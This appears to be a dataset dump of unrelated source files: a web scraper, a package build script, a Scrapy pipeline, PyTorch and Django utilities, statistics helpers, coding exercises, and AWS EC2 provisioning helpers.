image.getpixel(enemy)\n if len(pixel) > 3:\n pixel = (pixel[0], pixel[1], pixel[2])\n if pixel == self.coordinates.over_color \\\n or pixel == self.coordinates.under_color:\n current_enemies.append(self.coordinates.enemy_press[enemy])\n self.current_enemies = current_enemies\n self.enemy_count = len(current_enemies)\n","sub_path":"enemies/enemy_monitor.py","file_name":"enemy_monitor.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"356033787","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\"\"\"\n Topic: sample\n Desc : \n\"\"\"\nfrom html.parser import HTMLParser\n\nimport re\nfrom urllib.request import Request, urlopen\n\n\nclass Parselinks(HTMLParser):\n def __init__(self):\n self.data = []\n self.href = 0\n self.linkname = ''\n self.patt = re.compile(r'^/doc/\\d+$')\n HTMLParser.__init__(self)\n\n def handle_starttag(self, tag, attrs):\n if tag == 'a':\n for name, value in attrs:\n if name == 'href' and re.match(self.patt, value):\n self.href = 1\n self.data.append([value])\n\n def handle_data(self, data):\n if self.href:\n self.linkname += data\n\n def handle_endtag(self, tag):\n if tag == 'a' and self.href:\n self.linkname = ''.join(self.linkname.split())\n self.linkname = self.linkname.strip()\n self.data[-1].append(self.linkname)\n self.linkname = ''\n self.href = 0\n\n\nclass ParsePages(HTMLParser):\n def __init__(self):\n self.data = set([])\n self.href = 0\n self.patt = re.compile(r'^\\?p=\\d+$')\n HTMLParser.__init__(self)\n\n def handle_starttag(self, tag, attrs):\n if tag == 'a':\n for name, value in attrs:\n if name == 'href' and re.match(self.patt, value):\n self.href = 1\n self.data.add(value)\n\n def handle_endtag(self, tag):\n if tag == 'a' and self.href:\n self.href = 0\n\n\ndef fetch_data(pparser, url):\n headers = {\n 'User-Agent': '''Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)\n Chrome/28.0.1500.72 Safari/537.36'''\n }\n req = Request(\n url=url,\n headers=headers\n )\n pparser.feed(urlopen(req).read())\n pparser.close()\n return pparser.data\n\n\ndef main():\n result = []\n pattt = re.compile(r'程序员编码诀窍')\n urll = 'http://www.oschina.network/doc'\n pages = fetch_data(ParsePages(), urll)\n for eachurl in pages:\n print('**********')\n each_page_data = fetch_data(Parselinks(), urll + eachurl)\n for each_link_data in each_page_data:\n if re.match(pattt, each_link_data[1]):\n result.append(each_link_data)\n\n 
print(\"*\" * 30)\n for r in result:\n print('%s -> %s' % tuple(r))\n\n\nif __name__ == '__main__':\n main()","sub_path":"basic/mynetwork/html_parser.py","file_name":"html_parser.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"189374691","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\n# Copyright 2006-2008 TUBITAK/UEKAE\n# Licensed under the GNU General Public License, version 2.\n# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt\n\nfrom pisi.actionsapi import autotools\nfrom pisi.actionsapi import pisitools\nfrom pisi.actionsapi import perlmodules\nfrom pisi.actionsapi import get\n\nWorkDir=\"git-%s\" % get.srcVERSION().replace(\"_\",\".\")\n\ndef build():\n autotools.make('CFLAGS=\"%s\" \\\n LDFLAGS=\"%s\" \\\n DESTDIR=%s \\\n prefix=/usr \\\n GITWEB_CSS=\"gitweb/gitweb.css\" \\\n GITWEB_LOGO=\"gitweb/git-logo.png\" \\\n GITWEB_FAVICON=\"gitweb/git-favicon.png\" \\\n all' % (get.CFLAGS(), get.LDFLAGS(), get.installDIR()))\n\ndef install():\n autotools.rawInstall(\"DESTDIR=%s prefix=/usr\" % get.installDIR())\n\n # install-doc has compatibility issues with our docbook-xsl, use upstream's manpages\n # see manpages.patch in pspec.xml\n #autotools.make(\"DESTDIR=%s prefix=/usr mandir=/usr/share/man install-doc\" % get.installDIR())\n\n pisitools.insinto(\"/usr/share/man/man1/\", \"Documentation/man1/*.1\")\n pisitools.insinto(\"/usr/share/man/man5/\", \"Documentation/man5/*.5\")\n pisitools.insinto(\"/usr/share/man/man7/\", \"Documentation/man7/*.7\")\n\n # Emacs stuff\n pisitools.insinto(\"/usr/share/emacs/site-lisp\",\"contrib/emacs/*.el\")\n\n # gitweb\n pisitools.insinto(\"/var/www/localhost/cgi-perl\",\"gitweb/gitweb.cgi\",\"gitweb.pl\")\n pisitools.insinto(\"/var/www/localhost/cgi-perl/gitweb\",\"gitweb/*.css\")\n pisitools.insinto(\"/var/www/localhost/cgi-perl/gitweb\",\"gitweb/*.png\")\n\n perlmodules.fixLocalPod()\n\n pisitools.dodoc(\"README\", \"COPYING\", \"Documentation/SubmittingPatches\")\n","sub_path":"pardus/tags/2009/programming/vcs/git/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"447383220","text":"#-*-coding:utf8 -*-\nfrom os import path\nfrom scrapy import signals\nfrom scrapy.xlib.pydispatch import dispatcher \nfrom scrapy.exceptions import DropItem\nclass myPipeline(object):\n import sys \n reload(sys) \n sys.setdefaultencoding('utf-8')\n\n count = 0\n filename = 'data/davos_crawl_data'\n def __init__(self):\n self.f = None \n self.f1 = None\n dispatcher.connect(self.open, signals.engine_started)\n dispatcher.connect(self.close, signals.engine_stopped)\n def process_item(self,item,spider):\n if(item['id'] != None and\n item['title'] != None and\n item['url'] != None and\n item['time'] != None and\n item['author'] != None and \n item['site'] != None and\n item['content'] != None):\n if not u\"2012年04月10日\" in item['time']:\n raise DropItem(\"time error\")\n self.count = self.count + 1\n id=self.count \n title=item['title']\n href=item['url']\n time=item['time']\n author=item['author']\n site=item['site']\n content=item['content']\n\n self.f = open(self.filename+'/'+str(self.count)+'.txt','w')\n self.f.write(str(title)+\"\\n \"+str(href)+ '\\n'+str(time)+'\\n'+str(author)+'\\n'+str(site)+'\\n'+str(content)+'\\n\\n\\n')\n self.f1.write(str(id)+\".\"+str(title)+\"\\n \"+str(href)+ 
'\\n'+str(time)+'\\n'+str(author)+'\\n'+str(site)+'\\n'+str(content)+'\\n\\n\\n')\n self.f.close() if self.f is not None else None\n return item \n def open(self): \n if path.exists( self.filename+'.txt'): \n self.f1 = open(self.filename+'.txt', 'a')\n else:\n self.f1 = open(self.filename+'.txt', 'w') \n def close(self):\n self.f1.close() if self.f1 is not None else None\n","sub_path":"scrapy/davos/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"46353844","text":"import torch as th\nfrom torch.autograd import Variable\nfrom collections import OrderedDict\nimport torch.nn as nn\nimport numpy as np\nfrom schnetpack2.data import Structure\n\nimport pdb\n\ndef make_input(device, batch_size = 10, N_atoms = 5):\n inputs = {}\n \n inputs[Structure.Z] = th.randint(1, 30, (batch_size, N_atoms)).long()\n inputs[Structure.R] = th.rand(batch_size, N_atoms, 3)\n inputs[Structure.cell] = th.eye(3).unsqueeze(0).expand(batch_size,3,3)\n inputs[Structure.cell_offset] = th.randint(-1, 2, (batch_size, N_atoms, N_atoms-1,3)).float()\n inputs[Structure.neighbors] = th.randint(0, N_atoms, (batch_size, N_atoms,N_atoms-1)).long()\n inputs[Structure.neighbor_mask] = th.zeros_like(inputs[Structure.neighbors]).float()\n inputs[Structure.atom_mask] = th.zeros_like(inputs[Structure.Z]).float()\n\n return {k:Variable(v.to(device)) for k,v in inputs.items()}\n\ndef summary(model, device):\n def register_hook(module):\n def hook(module, input, output):\n class_name = str(module.__class__).split('.')[-1].split(\"'\")[0]\n module_idx = len(summary)\n\n m_key = '%s-%i' % (class_name, module_idx+1)\n summary[m_key] = OrderedDict()\n \n if (isinstance(input, list) or isinstance(input, tuple)) and isinstance(input[0], th.Tensor):\n summary[m_key]['input_shape'] = list(input[0].size())\n summary[m_key]['input_shape'][0] = -1\n elif (isinstance(input, list) or isinstance(input, tuple)) and isinstance(input[0], dict):\n summary[m_key]['input_shape'] = list(input[0][Structure.neighbors].size())\n summary[m_key]['input_shape'][0] = -1\n elif isinstance(input, tuple) and isinstance(input[0], list) and isinstance(input[0][0], th.Tensor):#only for SC layer\n summary[m_key]['input_shape'] = list(input[0][0].size())\n summary[m_key]['input_shape'][0] = -1\n if not isinstance(output, dict):\n summary[m_key]['output_shape'] = list(output.size())\n summary[m_key]['output_shape'][0] = -1\n else:\n summary[m_key]['output_shape'] = list(output['y'].size())\n summary[m_key]['output_shape'][0] = -1\n \n params = 0\n if hasattr(module, 'weight'):\n params += th.prod(th.LongTensor(list(module.weight.size())))\n if module.weight.requires_grad:\n summary[m_key]['trainable'] = True\n else:\n summary[m_key]['trainable'] = False\n if hasattr(module, 'bias') and module.bias is not None:\n params += th.prod(th.LongTensor(list(module.bias.size())))\n if hasattr(module, 'offsets'):\n params += th.prod(th.LongTensor(list(module.offsets.size())))\n if module.offsets.requires_grad:\n summary[m_key]['trainable'] = True\n else:\n summary[m_key]['trainable'] = False \n if hasattr(module, 'width'):\n params += th.prod(th.LongTensor(list(module.width.size())))\n if module.width.requires_grad:\n summary[m_key]['trainable'] = True\n else:\n summary[m_key]['trainable'] = False \n summary[m_key]['nb_params'] = params\n \n if not isinstance(module, nn.Sequential) and \\\n not isinstance(module, nn.ModuleList) and \\\n not (module 
== model):\n hooks.append(module.register_forward_hook(hook))\n \n# dtype = th.cuda.FloatTensor\n \n x = make_input(device, batch_size = 10, N_atoms = 5)\n \n # create properties\n summary = OrderedDict()\n hooks = []\n # register hook\n model.apply(register_hook)\n # make a forward pass\n model(x)\n # remove these hooks\n for h in hooks:\n h.remove()\n\n print('----------------------------------------------------------------')\n line_new = '{:25} {:25} {:15}'.format('Layer (type)', 'Output Shape', 'Param #')\n print(line_new)\n print('================================================================')\n total_params = 0\n trainable_params = 0\n \n for layer in summary:\n ## input_shape, output_shape, trainable, nb_params\n trainable_params_print = 0\n if 'trainable' in summary[layer]:\n if summary[layer]['trainable'] == True:\n trainable_params += summary[layer]['nb_params']\n trainable_params_print = summary[layer]['nb_params']\n string_aux = str(summary[layer][\"output_shape\"])\n line_new = f'{layer:{25}} '\n line_new += f'{string_aux:{25}} '\n line_new += f'{trainable_params_print:{15}}'\n total_params += summary[layer]['nb_params']\n print(line_new)\n print('================================================================')\n print('Total params: ' + str(total_params))\n print('Trainable params: ' + str(trainable_params))\n print('Non-trainable params: ' + str(total_params - trainable_params))\n print('----------------------------------------------------------------')\n return summary","sub_path":"custom/utils/model_summary.py","file_name":"model_summary.py","file_ext":"py","file_size_in_byte":5707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"529714356","text":"from pluto.apps.home import models, err_code\nfrom pluto.apps.project_case import models as project_case_models\nfrom pluto.apps.media import models as media_models\nfrom pluto.libs.test_utils import PlutoTestCase\n\n\nclass TopVideoTest(PlutoTestCase):\n def setUp(self):\n self.HOME_VIDEO_URL = '/home/api/v1/top_video'\n\n def _assert_top_video(self, video):\n resp = self._get(self.HOME_VIDEO_URL)\n\n self._test_success(resp)\n self.assertEqual(resp['data']['title'], video.title)\n\n @staticmethod\n def _create_top_video(title):\n video = media_models.Video.objects.create(title=title)\n\n top_video = models.TopVideo(video=video)\n top_video.save()\n\n return video, top_video\n\n def test_top_video_api(self):\n video1 = media_models.Video.objects.create(title='测试视频#1')\n models.TopVideo.objects.create(video=video1)\n\n self._assert_top_video(video1)\n\n def test_top_video_api_return_only_one_top_video(self):\n video1, top_video1 = self._create_top_video('测试视频#1')\n self._assert_top_video(video1)\n\n video2, top_video2 = self._create_top_video('测试视频#2')\n self._assert_top_video(video2)\n\n top_video1.available = True\n top_video1.save()\n self._assert_top_video(video1)\n\n def test_top_video_api_return_failure_resp_when_no_top_video(self):\n resp = self._get(self.HOME_VIDEO_URL)\n\n self._test_failure(resp, err_code.TOP_VIDEO_NOT_FOUND)\n self.assertEqual(resp['data'], None)\n\n\nclass SlideShowProjectCasesTest(PlutoTestCase):\n def setUp(self):\n self.SLIDESHOW_VIDEOS_URL = '/home/api/v1/slideshow/project_cases'\n\n def test_slideshow_project_case_api(self):\n media_models.Video.objects.create(title='测试视频#1')\n video2 = media_models.Video.objects.create(title='测试视频#2')\n media_models.Video.objects.create(title='测试视频#3')\n\n project_case1 = 
project_case_models.ProjectCase.objects.create(video=video2)\n project_case2 = project_case_models.ProjectCase.objects.create()\n\n models.SlideShowProjectCase.objects.create(priority=3)\n models.SlideShowProjectCase.objects.create(project_case=project_case1, priority=1)\n models.SlideShowProjectCase.objects.create(project_case=project_case2, priority=2)\n\n resp = self._get(self.SLIDESHOW_VIDEOS_URL)\n\n self._test_success(resp)\n self.assertEqual(resp['data'][0]['title'], project_case1.video.title)\n self.assertEqual(len(resp['data']), 1)\n\n\nclass SlideShowImagesTest(PlutoTestCase):\n def setUp(self):\n self.SLIDESHOW_IMAGES_URL = '/home/api/v1/slideshow/images'\n\n def test_slideshow_images_api(self):\n models.SlideShowImage.objects.create(img1='test/aaa.png')\n\n resp = self._get(self.SLIDESHOW_IMAGES_URL)\n\n self._test_success(resp)\n","sub_path":"pluto/apps/home/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"455890725","text":"\"\"\"Age-Fitness selection\n\nThis module implements the Age-Fitness selection algorithm that defines\nthe selection used in the Age-Fitness evolutionary algorithm module.\nThis module expects to be used in conjunction with the\n``RandomIndividualVariation`` module that wraps the ``VarOr`` module.\n\"\"\"\nimport numpy as np\n\nfrom .Selection import Selection\nfrom ..Util.ArgumentValidation import argument_validation\n\n\nclass AgeFitness(Selection):\n \"\"\"Age-Fitness selection\n\n Parameters\n ----------\n selection_size : int\n The size of the group of individuals to be randomly\n compared. The size must be an integer greater than 1.\n \"\"\"\n WORST_CASE_FACTOR = 50\n\n @argument_validation(selection_size={\">=\": 2})\n def __init__(self, selection_size=2):\n self._selection_size = selection_size\n self._selected_indices = []\n self._population_index_array = np.array([])\n self._selection_attempts = 0\n\n @argument_validation(target_population_size={\">\": 0})\n def __call__(self, population, target_population_size):\n \"\"\"Performs Age-Fitness selection on a population. If ``selection_size``\n is larger than the population, the population size is used as the\n ``selection_size``.\n\n Parameters\n ----------\n population : list of Chromosome\n The population on which to perform selection\n target_population_size : int\n The size of the new population after selection. It will never be the\n case that the new population will have a size smaller than the\n target population. 
However, it *is* possible to for the new\n population to be larger than ``target_population_size``.\n\n Returns\n -------\n list of Chromosome :\n The chromosomes not selected for removal\n\n Raises\n ------\n ValueError\n If the ``target_population_size`` is larger than the intial\n `population`\n \"\"\"\n if target_population_size > len(population):\n raise ValueError(\"Target population size should\\\n be less than initial population\")\n\n num_removed = 0\n start_pop_size = len(population)\n self._population_index_array = np.random.permutation(len(population))\n\n self._selection_attempts = 0\n while (start_pop_size - num_removed) > target_population_size and \\\n self._selection_attempts < \\\n start_pop_size * self.WORST_CASE_FACTOR:\n\n self._get_unique_random_individuals(population,\n self._selection_size,\n num_removed)\n removed_indv_indexs = self._get_individuals_for_removal(\n population, target_population_size, num_removed)\n num_removed = self._remove_indviduals(removed_indv_indexs,\n num_removed)\n self._selection_attempts += 1\n\n return self._update_population(population, num_removed)\n\n def select_pareto_front(self, population):\n \"\"\"Selects the pareto front for the `population`\n\n Parameters\n ----------\n population: list of Chromosomes\n The population to which the pareto front individuals will be \n selected from.\n\n Returns\n -------\n list of Chromosomes:\n The Chromosomes in the pareto front.\n \"\"\"\n num_removed = 0\n self._population_index_array = np.random.permutation(len(population))\n\n self._get_unique_random_individuals(population,\n len(population),\n num_removed)\n removed_indv_indexs = self._get_individuals_for_removal(\n population, 1, num_removed)\n num_removed = self._remove_indviduals(removed_indv_indexs, num_removed)\n\n return self._update_population(population, num_removed)\n\n def _get_unique_random_individuals(self,\n population,\n selection_size,\n num_removed):\n index_range = range(num_removed, len(population))\n selection_size = min(selection_size, len(index_range))\n self._selected_indices = np.random.choice(index_range,\n selection_size,\n replace=False)\n\n # TODO look into optimizing. 
Possibly greedy approach\n def _get_individuals_for_removal(self, population,\n target_population_size, num_removed):\n to_be_removed = set()\n num_remaining = len(population) - num_removed\n for i, indv_index_1 in enumerate(self._selected_indices[:-1]):\n for indv_index_2 in self._selected_indices[i+1:]:\n self._update_removal_set(population, indv_index_1,\n indv_index_2, to_be_removed)\n if num_remaining - len(to_be_removed) == target_population_size:\n return to_be_removed\n return to_be_removed\n\n def _update_removal_set(self, population, indv_index_1,\n indv_index_2, removal_set):\n indv_1 = self._get_indvidual(population, indv_index_1)\n indv_2 = self._get_indvidual(population, indv_index_2)\n\n if self._first_dominates(indv_1, indv_2):\n removal_set.add(indv_index_2)\n elif self._first_dominates(indv_2, indv_1):\n removal_set.add(indv_index_1)\n\n def _get_indvidual(self, population, index):\n population_list_index = self._population_index_array[index]\n return population[population_list_index]\n\n @staticmethod\n def _first_dominates(indv_a, indv_b):\n return indv_a.genetic_age <= indv_b.genetic_age and \\\n indv_a.fitness <= indv_b.fitness\n\n def _remove_indviduals(self, to_remove_list, num_removed):\n while to_remove_list:\n selection_index = to_remove_list.pop()\n if num_removed in to_remove_list:\n to_remove_list.remove(num_removed)\n to_remove_list.add(selection_index)\n self._swap(self._population_index_array,\n num_removed, selection_index)\n num_removed += 1\n return num_removed\n\n @staticmethod\n def _swap(array, index_1, index_2):\n array[index_1], array[index_2] = array[index_2], array[index_1]\n\n def _update_population(self, population, num_removed):\n new_population = [self._get_indvidual(population, kept_index)\n for kept_index\n in range(num_removed, len(population))]\n return new_population\n","sub_path":"bingo/Base/AgeFitnessSelection.py","file_name":"AgeFitnessSelection.py","file_ext":"py","file_size_in_byte":6884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"648160092","text":"# -*- coding: utf-8 -*-\n# pylint: disable=C0103,E1101\n\"\"\"\nMisc statistical functions.\n\"\"\"\n# Author: bertrand-l\n# License: BSD\n\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport numpy as np\ntry:\n import scipy.stats as spstats\nexcept ImportError:\n spstats = None\n\n\n__all__ = ('f_test', 'likelihood_ratio_test', 't_test_1samp', 'wald_test')\n\n\ndef confint(mean, scale, level=0.95, ndof=None):\n \"\"\"\n Confidence interval.\n\n Parameters\n ----------\n mean, scale : float or array_like\n mean and standard deviation of the parameters\n level : float 0 < < 1, optional\n confidence level\n ndof : int, optional\n number of degrees of freedom. If not specified, errors are assumed to\n be normally distributed. 
Otherwise, they are assumed to follow a\n t-distribution with `ndof` degrees of freedom.\n\n Returns\n -------\n confint : array\n \"\"\"\n mean, scale = np.asarray(mean), np.asarray(scale)\n if len(mean.shape) == 0:\n mean.shape = [1]\n if len(scale.shape) == 0:\n scale *= np.ones(len(mean))\n if spstats is not None:\n if ndof is not None:\n intervals = [spstats.t.interval(level, ndof, loc=loc, scale=sca)\n for loc, sca in zip(mean, scale)]\n else:\n intervals = [spstats.norm.interval(level, loc=loc, scale=sca)\n for loc, sca in zip(mean, scale)]\n intervals = np.array(intervals)\n else:\n intervals = np.array([(None, None)] * len(mean))\n if len(intervals) == 1:\n intervals = intervals[0]\n return intervals\n\n\ndef f_test(F, n_dof1, n_dof2):\n \"\"\"\n F-test.\n\n Parameters\n ----------\n F : float\n F-statistics\n n_dof1, n_dof2 : int\n number of degrees of freedom\n\n Returns\n -------\n pvalue : float\n probability to observe at least that F\n \"\"\"\n if spstats is not None:\n pvalue = 1 - spstats.f.cdf(F, n_dof1, n_dof2)\n else:\n pvalue = None\n return pvalue\n\n\ndef likelihood_ratio_test(logl, logl_null, n_dof):\n \"\"\"\n Likelihood ratio test.\n\n Parameters\n ----------\n logl : float\n log-likelihood of the alternative model\n logl_null : float\n log-likelihood of the null model\n n_dof : int\n difference in degrees of freedom between the alternative and null\n models.\n\n Returns\n -------\n chi2 : float\n Likelihood ratio chi^2\n pvalue : float\n Probability to observe at least chi2 under the null hypothesis\n \"\"\"\n chi2 = 2 * (logl - logl_null)\n if spstats is not None:\n # Prob(> chi2) under H0.\n pvalue = 1. - spstats.chi2.cdf(chi2, n_dof)\n else:\n pvalue = None\n return chi2, pvalue\n\n\ndef t_test_1samp(theta, theta0, scaling, n_dof):\n \"\"\"\n One sample t-test.\n\n Parameters\n ----------\n theta : array_like\n estimated parameters\n theta0 : array_like\n theoretical parameters\n scaling : float\n scaling parameter like standard error of the estimated parameters\n n_dof : int\n number of degrees of freedom\n\n Returns\n -------\n tscore : array\n standardized value of theta.\n pvalue : array\n probability to observe at least that t-score under H0 that theta=theta0\n \"\"\"\n theta, theta0 = np.asarray(theta), np.asarray(theta0)\n tscore = (theta - theta0) / scaling\n if spstats is not None:\n pvalue = np.array([1 - spstats.t.cdf(abs(t), n_dof) for t in tscore])\n else:\n pvalue = None\n return tscore, pvalue\n\n\ndef wald_test(theta, theta0, stddev):\n \"\"\"\n Wald test.\n\n Parameters\n ----------\n theta : array_like\n estimated parameters\n theta0 : array_like\n theoretical parameters\n stddev : float\n standard deviation/error of the estimated parameters\n\n Returns\n -------\n zscore : array\n standardized value of theta.\n pvalue : array\n probability to observe at least that t-score under H0 that theta=theta0\n \"\"\"\n theta, theta0 = np.asarray(theta), np.asarray(theta0)\n zscore = (theta - theta0) / stddev\n if spstats is not None:\n pvalue = np.array([1 - spstats.norm.cdf(abs(z)) for z in zscore])\n else:\n pvalue = None\n return zscore, pvalue\n","sub_path":"learnml/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"292016519","text":"class _Impl:\n '''\n gets a single character from standard input. 
does not echo to the screen.\n    http://stackoverflow.com/questions/510357/python-read-a-single-character-from-the-user\n    '''\n    def __init__(self):\n        try:\n            self.impl = _Windows()\n        except ImportError:\n            self.impl = _Posix()\n    def __call__(self):\n        return self.impl()\n\nclass _Posix:\n    def __init__(self):\n        termios = __import__(r'termios')\n        self.getattr, self.setattr, self.SADRAIN =\\\n            termios.tcgetattr, termios.tcsetattr, termios.TCSADRAIN\n    def __call__(self):\n        from sys import stdin\n        from tty import setraw as tty_set_raw\n        stdin_fd = stdin.fileno()\n        old_settings = self.getattr(stdin_fd)\n        try:\n            tty_set_raw(stdin_fd)\n            ch = stdin.read(1)\n        finally:\n            self.setattr(stdin_fd, self.SADRAIN, old_settings)\n        return ch\n\nclass _Windows:\n    def __init__(self):\n        self.getch = __import__(r'msvcrt').getch\n    def __call__(self):\n        return self.getch()\n\nkey_by_key = _Impl()\n","sub_path":"ken2015nov/keybykey.py","file_name":"keybykey.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"320262780","text":"\ndef solution(rows, columns, queries):\n    answer = []\n    graph = [[0] * columns for _ in range(rows)]\n    \n    v = 1\n    for i in range(rows):\n        for j in range(columns):\n            graph[i][j] = v\n            v+=1\n    \n    for query in queries:\n        x1, y1, x2, y2 = query[0]-1, query[1]-1, query[2]-1, query[3]-1\n\n        rt = graph[x1][y2]\n        min_value = rt\n\n        #left to right\n        for i in range(y2,y1,-1):\n            graph[x1][i] = graph[x1][i-1]\n            min_value = min(min_value, graph[x1][i])\n\n        #bottom to top\n        for i in range(x1,x2):\n            graph[i][y1] = graph[i+1][y1]\n            min_value = min(min_value, graph[i][y1])\n        \n        #right to left\n        for i in range(y1,y2):\n            graph[x2][i] = graph[x2][i+1]\n            min_value = min(min_value, graph[x2][i])\n        \n        #top to bottom\n        for i in range(x2,x1,-1):\n            graph[i][y2] = graph[i-1][y2]\n            min_value = min(min_value, graph[i][y2])\n        \n        graph[x1+1][y2] = rt\n        answer.append(min_value)\n    \n    return answer\n\nrows = 6\ncolumns = 6\nqueries = [[2,2,5,4],[3,3,6,6],[5,1,6,3]]\nprint(solution(rows,columns,queries))\n\n\n","sub_path":"4.programmers/practice/Prog_연습문제_행렬 테두리 회전하기.py","file_name":"Prog_연습문제_행렬 테두리 회전하기.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"320526561","text":"'''Add an element-count field to LList.\r\nDefine a custom __len__() to return the number of elements.'''\r\n\r\n# Error class for list operations\r\nclass LinkedListUnderflow(ValueError):\r\n    pass\r\n# Node class\r\nclass LNode(object):\r\n\r\n    def __init__(self, elem=0, next_=None):\r\n        self.elem = elem\r\n        self.next = next_\r\n\r\nclass LList(object):\r\n\r\n    def __init__(self, lnode):\r\n        # The list starts with a head pointer and a counter node\r\n        self.num_node = lnode\r\n        self._head = self.num_node\r\n\r\n    # Compute the length\r\n    def __len__(self):\r\n        p, n = self._head.next, 0\r\n        while p is not None:\r\n            n += 1\r\n            p = p.next\r\n        return n\r\n\r\n    # Append at the tail\r\n    def append(self, elem):\r\n        if self._head.next is None:\r\n            self._head.next = LNode(elem)\r\n            self.num_node.elem += 1\r\n            return\r\n        p = self.num_node\r\n        while p.next is not None:\r\n            p = p.next\r\n        p.next = LNode(elem)\r\n        self.num_node.elem += 1\r\n\r\n    # Print every element of the list\r\n    def show_all(self):\r\n        # p is the traversal pointer\r\n        p = self._head.next\r\n        # If the list is empty\r\n        if p is None:\r\n            raise LinkedListUnderflow('the list is empty')\r\n        while p is not None:\r\n            print(p.elem, end='')\r\n            if p.next is not None:\r\n                print(',', end='')\r\n            p = p.next\r\n        print('')\r\n\r\nif __name__ == '__main__':\r\n\r\n    lnode = LNode()\r\n    llist = LList(lnode)\r\n    for i in range(1, 11):\r\n        
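# build a small demo list with the values 1 through 10 (descriptive comment added)\r\n        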
llist.append(i)\r\n llist.show_all()\r\n print(llist.num_node.elem)\r\n print(len(llist))\r\n\r\n","sub_path":"数据结构Python/code/practice/线性表/P1.py","file_name":"P1.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"530323766","text":"import boto3\nimport json\nimport subprocess\nimport sys\nimport time\n\nscp = 'scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i default.pem'\nssh = 'ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -T -i default.pem'\n\n# Amazon Linux 2 AMI (HVM), SSD Volume Type\nimage_amzn_ami_x64 = 'ami-02e680c4540db351e'\n\ndef image_find(ec2, packageId):\n filters = [{'Name': 'tag:Name', 'Values': [packageId]}]\n images = ec2.describe_images(Filters=filters, Owners=['self'])['Images']\n if len(images) < 1:\n return None\n else:\n return images[0]['ImageId']\n\ndef instance_start(ec2, settings, security_group_id, userdata=''):\n instances = ec2.run_instances(\n ImageId=image_amzn_ami_x64,\n InstanceType=settings['instanceType'],\n KeyName=settings['keyPair'],\n SecurityGroupIds=[security_group_id],\n MinCount=1,\n MaxCount=1\n )['Instances']\n\n if len(instances) < 1:\n print('Could not start EC2 instance!')\n sys.exit(1)\n\n time.sleep(0.5)\n\n instance = boto3.resource('ec2').Instance(instances[0]['InstanceId'])\n return instance\n\ndef security_group_find(ec2, name):\n filters = [{'Name': 'tag:Name', 'Values': [name]}]\n groups = ec2.describe_security_groups(Filters=filters)['SecurityGroups']\n if len(groups) < 1:\n return None\n else:\n return groups[0]['GroupId']\n\ndef security_group_find_or_create(ec2, name, vpc_id, ports):\n group_id = security_group_find(ec2, name)\n\n if group_id == None:\n group_id = ec2.create_security_group(GroupName=name, Description=name, VpcId=vpc_id)['GroupId']\n group = boto3.resource('ec2').SecurityGroup(group_id)\n group.create_tags(Tags=[{'Key':'Name', 'Value': name}])\n security_group_ingress_authorize(group, ports)\n\n return group_id\n\ndef security_group_ingress_authorize(group, ports):\n for port in ports:\n group.authorize_ingress(\n CidrIp='0.0.0.0/0',\n FromPort=port,\n ToPort=port,\n IpProtocol='tcp'\n )\n\ndef subnet_find(ec2, name):\n filters = [{'Name': 'tag:Name', 'Values': [name]}]\n subnets = ec2.describe_subnets(Filters=filters)['Subnets']\n if len(subnets) < 1:\n return None\n else:\n return subnets[0]['SubnetId']\n\n\ndef settings_read():\n with open('settings.json') as json_data:\n data = json.load(json_data,) \n return data\n\ndef sys_call(cmd):\n return subprocess.call([cmd], shell=True)\n\ndef sys_process(cmd, stdin):\n p = subprocess.Popen([cmd], shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n (out, _) = p.communicate(stdin.encode())\n return out.decode()\n\ndef vpc_default(ec2):\n vpcs = ec2.describe_vpcs(Filters=[{'Name': 'isDefault', 'Values': ['true']}])['Vpcs']\n if len(vpcs) < 1:\n print(\"Default VPC not found!\")\n sys.exit(1)\n return vpcs[0]['VpcId']\n\ndef vpc_find(ec2, name):\n filters = [{'Name': 'tag:Name', 'Values': [name]}]\n vpcs = ec2.describe_vpcs(Filters=filters)['Vpcs']\n if len(vpcs) < 1:\n print(\"Default VPC not found!\")\n sys.exit(1)\n return vpcs[0]['VpcId']\n\n# Internals\ndef call_scp(public_ip, local, target, flags=\"\"):\n sys_call(scp + ' %s %s ec2-user@%s:%s'%(flags, local, public_ip, target))\n\ndef call_ssh(public_ip, script):\n result = sys_process(ssh + ' ec2-user@%s'%(public_ip), script)\n print(result)\n 
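# hand the decoded command output back to the caller for further parsing (descriptive comment added)\n    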
return result\n","sub_path":"lib/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
